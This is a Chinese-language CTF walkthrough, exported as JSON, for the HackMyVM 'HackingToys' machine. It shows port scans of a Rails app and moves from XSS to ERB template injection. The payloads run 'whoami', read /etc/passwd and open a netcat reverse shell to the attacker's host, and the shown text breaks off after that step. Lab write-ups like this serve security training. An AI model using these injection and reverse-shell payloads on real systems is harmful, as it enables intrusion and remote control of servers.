{"id":797,"date":"2024-09-07T11:57:44","date_gmt":"2024-09-07T03:57:44","guid":{"rendered":"http:\/\/162.14.82.114\/?p=797"},"modified":"2024-09-07T11:57:44","modified_gmt":"2024-09-07T03:57:44","slug":"hmv-_-hackingtoys","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/797\/09\/07\/2024\/","title":{"rendered":"hmv[-_-]HackingToys"},"content":{"rendered":"<h1>HackingToys<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157954.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157954.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240904145612665\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157956.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157956.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240904151523172\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.103:22\nOpen 192.168.10.103:3000\nPORT     STATE SERVICE  REASON  VERSION\n22\/tcp   open  ssh      syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb\/34BxFp2oBx8o5xuZVXS1cE9nAlE=\n|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY\n3000\/tcp open  ssl\/ppp? 
syn-ack\n| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd\/stateOrProvinceName=Some-State\/countryName=FR\n| Issuer: organizationName=Internet Widgits Pty Ltd\/stateOrProvinceName=Some-State\/countryName=FR\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-05-20T15:36:20\n| Not valid after:  2038-01-27T15:36:20\n| MD5:   6ac6:1f8b:e3f8:dce0:4b1a:d12b:1259:386d\n| SHA-1: c423:6072:834f:77b9:396c:6907:8e29:08d6:f8c7:631d\n| -----BEGIN CERTIFICATE-----\n| MIIDazCCAlOgAwIBAgIUCWBIwc7YlGcff\/jPNV14n8rQolswDQYJKoZIhvcNAQEL\n| BQAwRTELMAkGA1UEBhMCRlIxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM\n| GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yNDA1MjAxNTM2MjBaFw0zODAx\n| MjcxNTM2MjBaMEUxCzAJBgNVBAYTAkZSMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw\n| HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB\n| AQUAA4IBDwAwggEKAoIBAQDbdGcclY6p5qgtAzPYwsGWj0LANe7g0b6MSQQkFY6Y\n| v9+8UGSOLIU09PFxeeNTdwmMICq3q2bpAc6Qv3Ixuigyv0tqB2DjNMWLemkLvOVd\n| nctKDqfSFo3SjjJmW8e7rTWq\/C4cu6JjR+ME8Ikd0hAqVRFzh0xfzOfWx1dDyN4S\n| ePgBlzV+nGWLXKwsZ2u266JKsVK4\/nkpGPT4SPSYE0w5G8xVMhpfqpu2juBPJyRV\n| fbzap1YCn+QWSnD6ku0ZQ0YXwAfyPiOSilFQJe4\/ZIYBgjJZH6w+DbBRLghDVgJ5\n| 5afmOjXZQA0TdQPfF2pUlAf7H07QoHhcTXgiNL82bKB9AgMBAAGjUzBRMB0GA1Ud\n| DgQWBBShpGMQrHmIzxxDoytRa\/d9GMFfJTAfBgNVHSMEGDAWgBShpGMQrHmIzxxD\n| oytRa\/d9GMFfJTAPBgNVHRMBAf8EBTADAQH\/MA0GCSqGSIb3DQEBCwUAA4IBAQBa\n| nEYqR+Z0ybI+C6dD9bOSZMrEHzzRvoIXw2Pgqj4DMVdx2ZEpoMvvn36xeV8JQmrk\n| obYrcyBdkUWhdpjMWK6fXtKQ4Dp\/O6D0RLdER8FYZCI0r\/yy5GCeeDloKiexHDq9\n| kuJ6lPoBFDIEK++h9eEvhVw2frL6f+ZBD486klmPhRi8hsxnE4O+olCpCjMLCzfM\n| E4l711CWj0pDTMeOfdxps1WaNsDIx\/tOqsERNqjIfcgmrPKsFTFtS\/sofcCdJ7lq\n| RXHpfM1vyRVHEmjNax4qePvpQAgdDcem87KLdDKzFAx\/FLTOrn3MLOj8d7XnjJZR\n| vozWyeMFGA20aSOApTH3\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n| fingerprint-strings: \n|   GenericLines: \n|     HTTP\/1.0 400 Bad Request\n|     Content-Length: 930\n|     Puma 
caught this error: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma? (Puma::HttpParserError)\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/client.rb:268:in `execute&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/client.rb:268:in `try_to_finish&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/server.rb:298:in `reactor_wakeup&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/server.rb:248:in `block in run&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:119:in `wakeup!&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:76:in `block in select_loop&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:76:in `select&#039;\n|     \/usr\/local\/rvm\/gems\/ruby-3.1.0\/gems\/puma-6.4.2\/lib\/puma\/reactor.rb:76:in `select_loop&#039;\n|     \/usr\/loc\n|   GetRequest: \n|     HTTP\/1.0 403 Forbidden\n|     content-type: text\/html; charset=UTF-8\n|     Content-Length: 5702\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;utf-8&quot; \/&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;&gt;\n|     &lt;meta name=&quot;turbo-visit-control&quot; content=&quot;reload&quot;&gt;\n|     &lt;title&gt;Action Controller: Exception caught&lt;\/title&gt;\n|     &lt;style&gt;\n|     body {\n|     background-color: #FAFAFA;\n|     color: #333;\n|     color-scheme: light dark;\n|     supported-color-schemes: light dark;\n|     margin: 0px;\n|     body, p, ol, ul, td {\n|     font-family: helvetica, verdana, arial, sans-serif;\n|     font-size: 13px;\n|     line-height: 18px;\n|     font-size: 11px;\n|     white-space: pre-wrap;\n|     pre.box {\n|     border: 1px solid #EEE;\n|     padding: 
10px;\n|     margin: 0px;\n|     width: 958px;\n|     header {\n|     color: #F0F0F0;\n|     background: #C00;\n|_    padding:\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port3000-TCP:V=7.94SVN%T=SSL%I=7%D=9\/4%Time=66D80951%P=x86_64-pc-linux-\nSF:gnu%r(GenericLines,3EF,&quot;HTTP\/1\\.0\\x20400\\x20Bad\\x20Request\\r\\nContent-L\nSF:ength:\\x20930\\r\\n\\r\\nPuma\\x20caught\\x20this\\x20error:\\x20Invalid\\x20HTT\nSF:P\\x20format,\\x20parsing\\x20fails\\.\\x20Are\\x20you\\x20trying\\x20to\\x20ope\nSF:n\\x20an\\x20SSL\\x20connection\\x20to\\x20a\\x20non-SSL\\x20Puma\\?\\x20\\(Puma:\nSF::HttpParserError\\)\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/\nSF:lib\/puma\/client\\.rb:268:in\\x20`execute&#039;\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\\nSF:.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/client\\.rb:268:in\\x20`try_to_finish&#039;\\n\/us\nSF:r\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/server\\.rb:298\nSF::in\\x20`reactor_wakeup&#039;\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.\nSF:4\\.2\/lib\/puma\/server\\.rb:248:in\\x20`block\\x20in\\x20run&#039;\\n\/usr\/local\/rvm\nSF:\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/reactor\\.rb:119:in\\x20`wa\nSF:keup!&#039;\\n\/usr\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/rea\nSF:ctor\\.rb:76:in\\x20`block\\x20in\\x20select_loop&#039;\\n\/usr\/local\/rvm\/gems\/rub\nSF:y-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/reactor\\.rb:76:in\\x20`select&#039;\\n\/us\nSF:r\/local\/rvm\/gems\/ruby-3\\.1\\.0\/gems\/puma-6\\.4\\.2\/lib\/puma\/reactor\\.rb:76\nSF::in\\x20`select_loop&#039;\\n\/usr\/loc&quot;)%r(GetRequest,169E,&quot;HTTP\/1\\.0\\x20403\\x2\nSF:0Forbidden\\r\\ncontent-type:\\x20text\/html;\\x20charset=UTF-8\\r\\nContent-L\nSF:ength:\\x205702\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20lang=\\
&quot;en\\&quot;&gt;\\n&lt;head&gt;\nSF:\\n\\x20\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;\\x20\/&gt;\\n\\x20\\x20&lt;meta\\x20name=\\&quot;vie\nSF:wport\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial-scale=1\\&quot;&gt;\\n\\x20\\x2\nSF:0&lt;meta\\x20name=\\&quot;turbo-visit-control\\&quot;\\x20content=\\&quot;reload\\&quot;&gt;\\n\\x20\\x20\nSF:&lt;title&gt;Action\\x20Controller:\\x20Exception\\x20caught&lt;\/title&gt;\\n\\x20\\x20&lt;s\nSF:tyle&gt;\\n\\x20\\x20\\x20\\x20body\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20background-co\nSF:lor:\\x20#FAFAFA;\\n\\x20\\x20\\x20\\x20\\x20\\x20color:\\x20#333;\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20color-scheme:\\x20light\\x20dark;\\n\\x20\\x20\\x20\\x20\\x20\\x20su\nSF:pported-color-schemes:\\x20light\\x20dark;\\n\\x20\\x20\\x20\\x20\\x20\\x20margi\nSF:n:\\x200px;\\n\\x20\\x20\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20body,\\x20p,\\x20ol,\\x20\nSF:ul,\\x20td\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20font-family:\\x20helvetica,\\x20v\nSF:erdana,\\x20arial,\\x20sans-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20font-size:\\x2\nSF:0\\x20\\x2013px;\\n\\x20\\x20\\x20\\x20\\x20\\x20line-height:\\x2018px;\\n\\x20\\x20\nSF:\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20pre\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20font-siz\nSF:e:\\x2011px;\\n\\x20\\x20\\x20\\x20\\x20\\x20white-space:\\x20pre-wrap;\\n\\x20\\x2\nSF:0\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20pre\\.box\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20bo\nSF:rder:\\x201px\\x20solid\\x20#EEE;\\n\\x20\\x20\\x20\\x20\\x20\\x20padding:\\x2010p\nSF:x;\\n\\x20\\x20\\x20\\x20\\x20\\x20margin:\\x200px;\\n\\x20\\x20\\x20\\x20\\x20\\x20wi\nSF:dth:\\x20958px;\\n\\x20\\x20\\x20\\x20}\\n\\n\\x20\\x20\\x20\\x20header\\x20{\\n\\x20\\\nSF:x20\\x20\\x20\\x20\\x20color:\\x20#F0F0F0;\\n\\x20\\x20\\x20\\x20\\x20\\x20backgrou\nSF:nd:\\x20#C00;\\n\\x20\\x20\\x20\\x20\\x20\\x20padding:&quot;);\nService Info: OS: Linux; CPE: 
cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u987a\u4fbf\u626b\u4e00\u4e0budp\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ sudo nmap -sU -sT -T4 --top-ports 100 $IP              \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-09-04 03:26 EDT\nWarning: 192.168.10.103 giving up on port because retransmission cap hit (6).\nStats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 85.71% done; ETC: 03:28 (0:00:08 remaining)\nNmap scan report for 192.168.10.103\nHost is up (0.0029s latency).\nNot shown: 98 closed tcp ports (conn-refused), 82 closed udp ports (port-unreach)\nPORT      STATE         SERVICE\n22\/tcp    open          ssh\n3000\/tcp  open          ppp\n68\/udp    open|filtered dhcpc\n88\/udp    open|filtered kerberos-sec\n120\/udp   open|filtered cfdptkt\n135\/udp   open|filtered msrpc\n158\/udp   open|filtered pcmail-srv\n500\/udp   open|filtered isakmp\n518\/udp   open|filtered ntalk\n996\/udp   open|filtered vsinet\n1025\/udp  open|filtered blackjack\n1028\/udp  open|filtered ms-lsa\n1813\/udp  open|filtered radacct\n2000\/udp  open|filtered cisco-sccp\n2049\/udp  open|filtered nfs\n2223\/udp  open|filtered rockwell-csp2\n5060\/udp  open|filtered sip\n33281\/udp open|filtered unknown\n49156\/udp open|filtered unknown\n49185\/udp open|filtered unknown\nMAC Address: 08:00:27:35:CF:CE (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 99.85 seconds<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157957.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157957.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101049597\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">https:\/\/192.168.10.101:3000\/products\/show\/1\nhttps:\/\/192.168.10.101:3000\/products\/show\/2\nhttps:\/\/192.168.10.101:3000\/products\/show\/3\nhttps:\/\/192.168.10.101:3000\/products\/show\/4\nhttps:\/\/192.168.10.101:3000\/products\/show\/5\nhttps:\/\/192.168.10.101:3000\/search?query=aaaaa&amp;message=Product+does+not+exist<\/code><\/pre>\n<p>\u4e94\u79cd\u8fd1\u6e90\u6e17\u900f\u5de5\u5177\uff0c\u8fd8\u6709\u4e00\u4e2a\u641c\u7d22\u6846\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157958.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157958.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101347822\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u7591\u4f3c\u5b58\u5728xss\u6ce8\u5165\u6f0f\u6d1e\uff0c\u968f\u4fbf\u8f93\u5165\u76ee\u5f55\u4f1a\u51fa\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157959.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157959.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101743045\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157960.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157960.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907101804627\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u662f\u4e00\u4e2a<code>ruby<\/code>\u7684\u76f8\u5173\u7f51\u9875\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157961.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157961.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907103018432\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>XSS+SSTI(ERB)<\/h3>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u6267\u884c\u76f8\u5173xss\u547d\u4ee4\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/xss-cross-site-scripting#injecting-inside-raw-html\">https:\/\/book.hacktricks.xyz\/pentesting-web\/xss-cross-site-scripting#injecting-inside-raw-html<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157962.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157962.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907102029428\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6267\u884c\u76f8\u5173\u547d\u4ee4\uff0c\u5c1d\u8bd5\u6a21\u677f\u6ce8\u5165\uff1a<\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#erb-ruby\">https:\/\/book.hacktricks.xyz\/pentesting-web\/ssti-server-side-template-injection#erb-ruby<\/a><\/p>\n<pre><code class=\"language-text\">&lt;%= 7*7 %&gt;\n%3C%25%3D%207%2A7%20%25%3E<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157963.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157963.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907103559313\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6267\u884c\u6210\u529f\uff01<\/p>\n<pre><code class=\"language-text\">&lt;%= system(&quot;whoami&quot;) %&gt;\n%3C%25%3D%20system%28%22whoami%22%29%20%25%3E\ntrue\n\n&lt;%= system(&#039;cat \/etc\/passwd&#039;) %&gt;\n%3C%25%3D%20system%28%27cat%20%2Fetc%2Fpasswd%27%29%20%25%3E\ntrue<\/code><\/pre>\n<p>\u53d1\u73b0\u53ea\u80fd\u6267\u884c\u5f97\u5230true\u7ed3\u679c\uff0c\u4f3c\u4e4e\u6807\u5fd7\u7740\u6267\u884c\u6210\u529f\uff1f\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">&lt;%= system(&#039;nc -e \/bin\/bash 192.168.10.102 1234&#039;) %&gt;\n%3C%25%3D%20system%28%27nc%20%2De%20%2Fbin%2Fbash%20192%2E168%2E10%2E102%201234%27%29%20%25%3E<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157964.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157964.png\" 
